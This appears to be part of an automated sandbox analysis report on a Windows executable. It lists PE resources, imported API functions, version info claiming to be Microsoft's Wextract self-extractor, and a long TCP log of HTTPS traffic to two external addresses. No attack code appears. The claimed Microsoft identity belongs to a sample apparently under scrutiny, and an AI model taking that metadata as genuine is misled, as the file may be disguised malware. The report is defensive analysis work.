RT_RCDATA	0x35918	0x4	data	English	United States
RT_RCDATA	0x3591c	0xc	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35928	0x4	data	English	United States
RT_RCDATA	0x3592c	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35938	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35940	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0x35948	0xbc	data	English	United States
RT_VERSION	0x35a04	0x41c	data	English	United States
RT_MANIFEST	0x35e20	0x5e7	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, RegSetValueExA, EqualSid, RegQueryValueExA, LookupPrivilegeValueA, RegCreateKeyExA, RegOpenKeyExA, RegQueryInfoKeyA, RegDeleteValueA, AllocateAndInitializeSid, FreeSid, AdjustTokenPrivileges, RegCloseKey
KERNEL32.dll	GetPrivateProfileIntA, GetFileAttributesA, IsDBCSLeadByte, GetSystemDirectoryA, GlobalUnlock, GetShortPathNameA, CreateDirectoryA, FindFirstFileA, GetLastError, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, GlobalFree, FindClose, GetPrivateProfileStringA, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, FindNextFileA, CompareStringA, _lopen, CloseHandle, LocalFree, DeleteFileA, ExitProcess, DosDateTimeToFileTime, CreateFileA, FindResourceA, GlobalAlloc, ExpandEnvironmentStringsA, LoadResource, WaitForSingleObject, SetEvent, GetModuleHandleW, FormatMessageA, SetFileTime, WriteFile, GetDriveTypeA, GetVolumeInformationA, TerminateThread, SizeofResource, CreateEventA, GetExitCodeProcess, CreateProcessA, _llseek, SetCurrentDirectoryA, GetTempFileNameA, ResetEvent, LockResource, GetSystemInfo, LoadLibraryExA, CreateMutexA, GetCurrentDirectoryA, GetVersionExA, GetVersion, GetTempPathA, CreateThread, LocalFileTimeToFileTime, SetFilePointer, GetWindowsDirectoryA, lstrcmpA, _lclose, GlobalLock, GetCurrentProcess, FreeResource, FreeLibrary, Sleep, GetStartupInfoA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, OutputDebugStringA, RtlUnwind, GetModuleHandleA, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, MulDiv, GetDiskFreeSpaceA, ReadFile
GDI32.dll	GetDeviceCaps
USER32.dll	GetDC, SendMessageA, SetForegroundWindow, MsgWaitForMultipleObjects, SendDlgItemMessageA, GetWindowRect, MessageBoxA, GetWindowLongA, PeekMessageA, ReleaseDC, GetDlgItem, SetWindowPos, ShowWindow, DispatchMessageA, SetWindowTextA, EnableWindow, CallWindowProcA, DialogBoxIndirectParamA, GetDlgItemTextA, LoadStringA, MessageBeep, CharUpperA, CharNextA, ExitWindowsEx, CharPrevA, EndDialog, GetDesktopWindow, SetDlgItemTextA, SetWindowLongA, GetSystemMetrics
msvcrt.dll	memset, ?terminate@@YAXXZ, _controlfp, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _acmdln, _initterm, _amsg_exit, __p__commode, _XcptFilter, _errno, _vsnprintf, __setusermatherr
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, GetFileVersionInfoSizeA, VerQueryValueA

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	Wextract
FileVersion	11.00.9600.16384 (winblue_rtm.130821-1623)
CompanyName	Microsoft Corporation
ProductName	Internet Explorer
ProductVersion	11.00.9600.16384
FileDescription	Win32 Cabinet Self-Extractor
OriginalFilename	WEXTRACT.EXE .MUI
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2021 14:13:47.579505920 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.579541922 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.579667091 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.609344959 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.609366894 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.663666010 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.663839102 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:47.664535046 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:47.664617062 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.022409916 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.022435904 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.022910118 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.023005962 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.026207924 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.068883896 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.488166094 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.488328934 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.488409042 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.490288019 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.568181038 CET	49837	443	192.168.2.3	172.217.168.46
Dec 15, 2021 14:13:48.568227053 CET	443	49837	172.217.168.46	192.168.2.3
Dec 15, 2021 14:13:48.635415077 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.635452986 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.635621071 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.636941910 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.636953115 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.694639921 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.694947958 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.695548058 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.695683956 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.708836079 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.708862066 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.709161997 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.709225893 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.710095882 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.752865076 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.954212904 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.954411030 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.955681086 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.955866098 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.957496881 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.957570076 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.958610058 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.958703041 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.959789038 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.959846973 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.959887981 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.959953070 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.960983038 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.961049080 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971039057 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971107960 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971148968 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971215963 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971458912 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971518993 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.971559048 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.971627951 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.972702026 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.972768068 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.972800016 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.972886086 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.973855019 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.973922014 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.973949909 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.974050045 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.975066900 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.975158930 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.975176096 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.975235939 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.976248026 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.976414919 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.976438046 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.976524115 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.977534056 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.977631092 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.977646112 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.977730989 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.978679895 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.978780031 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.978794098 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.978844881 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.979779959 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.979943991 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.979959011 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.980016947 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.980901003 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.980973959 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.981381893 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.981451988 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.981462955 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.981517076 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.982481003 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.982536077 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.982557058 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.982567072 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.982599020 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.982630968 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.983546019 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.983623028 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.983634949 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.983690977 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.984633923 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.984697104 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.984709024 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.984755993 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.985714912 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.985850096 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.985862017 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.985913992 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.988090992 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.988435984 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.988471031 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.988481998 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.988491058 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.988518953 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.988533974 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.988636017 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.989326954 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.989439011 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.989450932 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.989500046 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.990075111 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.990139961 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.990149975 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.990201950 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.990875959 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.990937948 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.990947962 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.991004944 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.991585970 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.991642952 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.991652012 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.991708994 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.992315054 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.992391109 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.992403030 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.992464066 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.993038893 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.993135929 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.993146896 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.993443012 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.993738890 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.993807077 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.993818998 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.993876934 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.994488001 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.994543076 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.994554043 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.994677067 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.994688988 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.994750977 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.995203972 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.995266914 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.995279074 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.995349884 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.995937109 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.995992899 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.996004105 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.996057034 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.996653080 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.996706963 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.996716976 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.996773005 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.997406006 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.997457981 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.997468948 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.997514963 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.998090029 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.998152018 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.998162031 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.998209000 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.998852968 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.998924017 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.998935938 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.998980999 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.999604940 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.999665976 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:48.999677896 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:48.999722958 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.000298977 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.000365019 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.000375986 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.000422955 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.001010895 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.001080036 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.001091957 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.001141071 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.001631021 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.001694918 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.001705885 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.001754045 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.002312899 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.002371073 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.002382040 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.002425909 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.002434015 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.002480984 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.003262997 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.003323078 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.003334045 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.003381014 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.003390074 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.004216909 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.004302979 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.004368067 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.004378080 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.004421949 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.004430056 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.004476070 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.005175114 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.005237103 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.005249977 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.005261898 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.005296946 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.005327940 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.006078959 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.006133080 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.006145000 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.006187916 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.006196022 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.006239891 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.006983995 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007034063 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.007049084 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007107973 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007145882 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007205009 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.007216930 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007275105 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.007752895 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007812977 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.007822990 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007869005 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.007878065 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.007921934 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.008339882 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.008398056 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.008424044 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.008477926 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.008485079 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.008532047 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.008539915 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.008590937 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.008599043 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.008641005 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.009351015 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.009407997 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.009418011 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.009473085 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.009481907 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.009521008 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.009526968 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.009567022 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.009573936 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.009618998 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.010278940 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.010345936 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.010355949 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.010397911 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.010406017 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.010442972 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.010449886 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.010495901 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.010505915 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.010552883 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.011220932 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.011270046 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.011295080 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.011337042 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.011348009 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.011385918 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.011393070 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.011430979 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.011440992 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.011478901 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.011486053 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.011531115 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.012145996 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.012201071 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.012211084 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.012255907 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.012263060 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.012310028 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.012317896 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.012373924 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.012867928 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.012923956 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.012936115 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.012976885 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.013020992 CET	443	49838	172.217.168.1	192.168.2.3
Dec 15, 2021 14:13:49.013066053 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.013103962 CET	49838	443	192.168.2.3	172.217.168.1
Dec 15, 2021 14:13:49.013123989 CET	443	49838	172.217.168.1	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
